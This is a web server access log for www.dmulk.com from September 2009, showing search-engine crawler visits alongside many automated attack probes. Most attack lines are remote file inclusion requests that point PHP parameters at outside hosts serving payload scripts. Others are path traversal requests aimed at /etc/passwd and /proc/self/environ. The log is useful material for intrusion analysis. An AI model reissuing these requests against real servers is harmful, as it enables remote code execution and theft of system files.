205.234.246.98 - - [16/Sep/2009:10:44:20 -0700] "GET /index.php?select=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 19822 "-" "-" "www.dmulk.com"
59.27.95.144 - - [16/Sep/2009:10:44:22 -0700] "GET /ask_password?dir=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:10:44:24 -0700] "GET /logs/access_090813.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
59.27.95.144 - - [16/Sep/2009:10:44:28 -0700] "GET /logs//ask_password?dir=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.27.95.144 - - [16/Sep/2009:10:44:28 -0700] "GET /logs/access_071228.log%20%20//ask_password?dir=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.27.95.144 - - [16/Sep/2009:10:44:28 -0700] "GET /logs/access_081017.log%20%20//ask_password?dir=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.6.18.216 - - [16/Sep/2009:10:45:06 -0700] "GET /logs/access_090205.log HTTP/1.0" 200 2512696 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
114.108.131.141 - - [16/Sep/2009:10:45:21 -0700] "GET /logs/access_090507.log%20%20/template.php?pagina=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.131.141 - - [16/Sep/2009:10:45:26 -0700] "GET /logs/access_090124.log%20%20/template.php?pagina=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.131.141 - - [16/Sep/2009:10:45:27 -0700] "GET /logs/access_090507.log%20%20/template.php?pagina=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.131.141 - - [16/Sep/2009:10:45:31 -0700] "GET /logs/access_090124.log%20%20/template.php?pagina=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:10:45:38 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:10:45:38 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:10:45:38 -0700] "GET /logs/access_080222.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:10:45:39 -0700] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:10:45:42 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:10:45:42 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:10:45:43 -0700] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:10:45:43 -0700] "GET /logs/access_080222.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:10:45:46 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:10:45:46 -0700] "GET /logs/access_080222.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:10:45:46 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:10:45:47 -0700] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:10:45:54 -0700] "GET /logs/access_080227.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
222.236.47.23 - - [16/Sep/2009:10:46:17 -0700] "GET /logs/access_090312.log//?_PHPLIB[libdir]=http://www.graveyardzombies.org//files/id.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
200.174.17.53 - - [16/Sep/2009:10:46:34 -0700] "GET /logs/access_090106.log%20%20///index.php?pg=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.174.17.53 - - [16/Sep/2009:10:46:35 -0700] "GET /logs/access_090106.log%20%20///index.php?pg=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:10:46:36 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:10:46:36 -0700] "GET /logs/access_080209.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:10:46:36 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:10:46:37 -0700] "GET /logs/access_081223.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:10:46:40 -0700] "GET /logs/access_080209.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:10:46:40 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:10:46:40 -0700] "GET /logs/access_081223.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:10:46:40 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:10:46:44 -0700] "GET /logs/access_081223.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:10:46:44 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:10:46:44 -0700] "GET /logs/access_080209.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:10:46:45 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [16/Sep/2009:10:47:06 -0700] "GET /logs/access_090814.log/index.php?visualizar=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [16/Sep/2009:10:47:06 -0700] "GET /logs/index.php?visualizar=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [16/Sep/2009:10:47:07 -0700] "GET /logs/access_090814.log/index.php?visualizar=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [16/Sep/2009:10:47:07 -0700] "GET /logs/index.php?visualizar=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [16/Sep/2009:10:47:07 -0700] "GET /index.php?visualizar=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 19782 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [16/Sep/2009:10:47:07 -0700] "GET /index.php?visualizar=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 19782 "-" "Mozilla/5.0" "www.dmulk.com"
65.55.106.161 - - [16/Sep/2009:10:47:17 -0700] "GET /robots.txt HTTP/1.1" 200 36 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "dmulk.com"
212.98.171.91 - - [16/Sep/2009:10:47:30 -0700] "GET /logs/access_080614.log/errors.php?error=http://www.rainbow.by//data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.98.171.91 - - [16/Sep/2009:10:47:30 -0700] "GET /logs/access_080416.log/errors.php?error=http://www.rainbow.by//data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [16/Sep/2009:10:47:36 -0700] "GET /logs/access_090814.log%20%20/index.php?visualizar=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [16/Sep/2009:10:47:42 -0700] "GET /logs/access_090814.log%20%20/index.php?visualizar=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [16/Sep/2009:10:47:45 -0700] "GET /logs/access_081110.log%20%20/index.php?visualizar=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [16/Sep/2009:10:47:48 -0700] "GET /logs/access_081110.log%20%20/index.php?visualizar=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.104.160.110 - - [16/Sep/2009:10:47:56 -0700] "GET /logs//skin/ggambo7002_boardgallery/error.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.104.160.110 - - [16/Sep/2009:10:47:56 -0700] "GET /logs/access_090903.log%20%20//skin/ggambo7002_boardgallery/error.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.104.160.110 - - [16/Sep/2009:10:47:56 -0700] "GET /skin/ggambo7002_boardgallery/error.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.232.143.55 - - [16/Sep/2009:10:48:19 -0700] "GET /logs/access_090903.log//skin/ggambo7002_boardgallery/error.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.232.143.55 - - [16/Sep/2009:10:48:19 -0700] "GET /skin/ggambo7002_boardgallery/error.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.232.143.55 - - [16/Sep/2009:10:48:19 -0700] "GET /logs//skin/ggambo7002_boardgallery/error.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.212.41.182 - - [16/Sep/2009:10:49:33 -0700] "GET /logs/access_090504.log%20//calendar.php?p=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "-" "www.dmulk.com"
89.212.41.182 - - [16/Sep/2009:10:49:34 -0700] "GET /logs/access_090504.log%20//calendar.php?p=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "-" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:10:49:57 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:10:50:03 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:10:50:03 -0700] "GET /logs/access_080226.log//components/com_simpleboard/image_upload.php?sbp=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:10:50:03 -0700] "GET /logs/access_080502.log//components/com_simpleboard/image_upload.php?sbp=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:10:50:25 -0700] "GET /logs/access_080226.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:10:50:25 -0700] "GET /logs/access_080502.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:10:50:26 -0700] "GET /logs/access_071206.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
75.126.49.163 - - [16/Sep/2009:10:50:45 -0700] "GET /impex/ImpExData.php?systempath=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.126.49.163 - - [16/Sep/2009:10:50:45 -0700] "GET /logs/impex/ImpExData.php?systempath=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.126.49.163 - - [16/Sep/2009:10:50:45 -0700] "GET /logs/access_080827.log/impex/ImpExData.php?systempath=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.126.49.163 - - [16/Sep/2009:10:50:49 -0700] "GET /logs/access_080617.log/impex/ImpExData.php?systempath=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:10:50:50 -0700] "GET /logs/access_080301.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:10:50:54 -0700] "GET /logs/access_090109.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:10:50:56 -0700] "GET /logs/access_071126.log HTTP/1.0" 200 40511 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:10:50:58 -0700] "GET /logs/access_081026.log HTTP/1.0" 200 65536 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
75.126.49.163 - - [16/Sep/2009:10:51:28 -0700] "GET /logs/access_080827.log%20%20/impex/ImpExData.php?systempath=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.126.49.163 - - [16/Sep/2009:10:51:28 -0700] "GET /logs/access_080617.log%20%20/impex/ImpExData.php?systempath=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:10:51:56 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:10:51:56 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:10:52:05 -0700] "GET /logs/access_080222.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:10:52:27 -0700] "GET /logs/access_090112.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.191.101.229 - - [16/Sep/2009:10:52:34 -0700] "GET /logs/access_080229.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.191.101.229 - - [16/Sep/2009:10:52:34 -0700] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.191.101.229 - - [16/Sep/2009:10:52:34 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.55.106.161 - - [16/Sep/2009:10:52:40 -0700] "GET /blog/index.php/category/motorcycles/page/2/ HTTP/1.1" 200 28714 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "dmulk.com"
85.10.213.166 - - [16/Sep/2009:10:53:08 -0700] "GET /logs/access_080912.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.10.213.166 - - [16/Sep/2009:10:53:08 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.10.213.166 - - [16/Sep/2009:10:53:08 -0700] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:10:53:16 -0700] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.131.141 - - [16/Sep/2009:10:53:21 -0700] "GET /logs/access_080417.log/template.php?pagina=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.131.141 - - [16/Sep/2009:10:53:21 -0700] "GET /logs/access_090204.log/template.php?pagina=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.131.141 - - [16/Sep/2009:10:53:22 -0700] "GET /logs/access_090204.log/template.php?pagina=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.108.131.141 - - [16/Sep/2009:10:53:22 -0700] "GET /logs/access_080417.log/template.php?pagina=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.10.213.166 - - [16/Sep/2009:10:53:35 -0700] "GET /logs/access_080229.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:10:53:55 -0700] "GET /logs/access_080222.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:10:53:55 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:10:53:55 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:10:53:55 -0700] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.166.221.168 - - [16/Sep/2009:10:53:58 -0700] "GET /logs/access_080321.log/index.php?pg=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.166.221.168 - - [16/Sep/2009:10:53:59 -0700] "GET /index.php?pg=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 19809 "-" "libwww-perl/5.805" "www.dmulk.com"
210.166.221.168 - - [16/Sep/2009:10:54:00 -0700] "GET /logs/index.php?pg=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.2 - - [16/Sep/2009:10:54:05 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tabakoff.ru//dimti/AinuLid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [16/Sep/2009:10:54:05 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tabakoff.ru//dimti/AinuLid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.52.205.88 - - [16/Sep/2009:10:54:05 -0700] "GET /logs//index2.php?pag=http://www.tuwebtv.es/cache/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.dmulk.com"
64.191.101.229 - - [16/Sep/2009:10:54:09 -0700] "GET /logs/access_080229.log%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [16/Sep/2009:10:54:10 -0700] "GET /logs/access_081027.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tabakoff.ru//dimti/AinuLid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:10:54:12 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:10:54:12 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:10:54:13 -0700] "GET /logs/access_080222.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [16/Sep/2009:10:54:13 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.rankkuwait.com/rankmail/copyright.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [16/Sep/2009:10:54:13 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.rankkuwait.com/rankmail/copyright.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [16/Sep/2009:10:54:13 -0700] "GET /logs/access_081027.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.rankkuwait.com/rankmail/copyright.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:10:54:14 -0700] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.251.142.142 - - [16/Sep/2009:10:54:17 -0700] "GET /logs/access_090903.log%20%20//skin/ggambo7002_boardgallery/error.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.251.142.142 - - [16/Sep/2009:10:54:17 -0700] "GET /logs//skin/ggambo7002_boardgallery/error.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.251.142.142 - - [16/Sep/2009:10:54:17 -0700] "GET /skin/ggambo7002_boardgallery/error.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
